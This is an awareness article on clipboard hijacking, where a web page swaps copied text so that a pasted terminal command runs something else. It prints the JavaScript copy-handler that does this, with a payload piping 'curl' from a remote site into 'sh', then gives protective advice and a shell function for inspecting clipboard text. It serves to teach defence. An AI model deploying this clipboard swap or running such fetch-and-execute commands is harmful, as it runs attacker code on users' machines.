How you can be compromised with a simple copy-paste


An unusual hacking demonstration will make you think twice before copying or pasting any text.


This is why you should NEVER copy and paste commands directly into your terminal. Ask any developer or administrator if they have ever copied a command line or code snippet from the web. The answer would probably be YES. You'd assume that what you copied is what you paste, right? Well, no!

You think you are copying one thing, but it is replaced by something else, such as malicious code. All it takes is a single line of code inserted into the code you copied to create a backdoor in your application.

This attack is very simple but can cause great damage. Let's see how it works in practice:

Thanks to Harel Friedlander for recording this video.

Suppose you are looking for how to update your Ubuntu system and you find the following command. Try it: copy and paste the following command:

$ sudo apt update

 

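Here is the JavaScript behind the exploit.

// Runs when the visitor copies text from the element with id "copyme".
document.getElementById('copyme').addEventListener('copy', function(e) {
    // Put different text on the clipboard; the trailing "\n" makes a terminal run it on paste.
    e.clipboardData.setData('text/plain',
        'echo "τo sudo apt update έγινε [curl http://kakovoulo-site.com | sh]"\n'
    );
    // Stop the browser from copying the text the visitor actually selected.
    e.preventDefault();
});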

How can I protect myself?

The safest way is to paste nothing from the web into your terminal. Another option is to type "#" before pasting; this turns the command into a comment, so it is not executed. This way you can see what you are pasting before your terminal runs it. You can of course also paste the command into a text file before putting it in your terminal.
Also, many terminals can be configured not to run a command automatically when the pasted text contains "\n" (a newline).
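
One way to look at the clipboard before pasting, as an added example (not code from the original article): a POSIX shell function, here given the hypothetical name inspect_paste, that flags newlines, control characters and any difference from the text you selected. The sample payload and its host name are constructed.

```shell
# inspect_paste [EXPECTED]: read clipboard text on stdin and report what the
# terminal would receive. Returns 0 only if nothing suspicious is found.
inspect_paste() {
    # The "x" sentinel stops $(...) from stripping trailing newlines.
    _ip_data=$(cat; printf x)
    _ip_data=${_ip_data%x}
    _ip_rc=0
    _ip_nl='
'
    # A newline makes the shell execute the line the moment it is pasted.
    case $_ip_data in
        *"$_ip_nl"*)
            echo "WARNING: contains a newline, so it runs as soon as it is pasted"
            _ip_rc=1 ;;
    esac
    # Other control characters (CR, ESC, backspace) can hide or rewrite text.
    if printf '%s' "$_ip_data" | tr -d '\n\t' | LC_ALL=C grep -q '[[:cntrl:]]'; then
        echo "WARNING: contains control characters"
        _ip_rc=1
    fi
    # Compare with what you believe you copied from the page.
    if [ "$#" -gt 0 ] && [ "$_ip_data" != "$1" ]; then
        echo "WARNING: clipboard is not the text you selected: $1"
        _ip_rc=1
    fi
    echo "Clipboard content (\$ = line end, ^X = control character):"
    printf '%s' "$_ip_data" | cat -vet
    echo
    return "$_ip_rc"
}

# Constructed sample modelled on the page's payload: a different command plus
# a trailing newline. The host name is a placeholder.
sample_hijacked() {
    printf 'echo "sudo apt update became [curl http://example.invalid | sh]"\n'
}

sample_hijacked | inspect_paste 'sudo apt update' || echo "=> do not paste this"
```

To check the real clipboard, pipe it in, for example `xclip -o -selection clipboard | inspect_paste 'sudo apt update'` on X11 or `pbpaste | inspect_paste 'sudo apt update'` on macOS.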

The above is just one example of why raising awareness is necessary to avoid intrusions. There are many examples of really malicious scripts circulating on the internet.
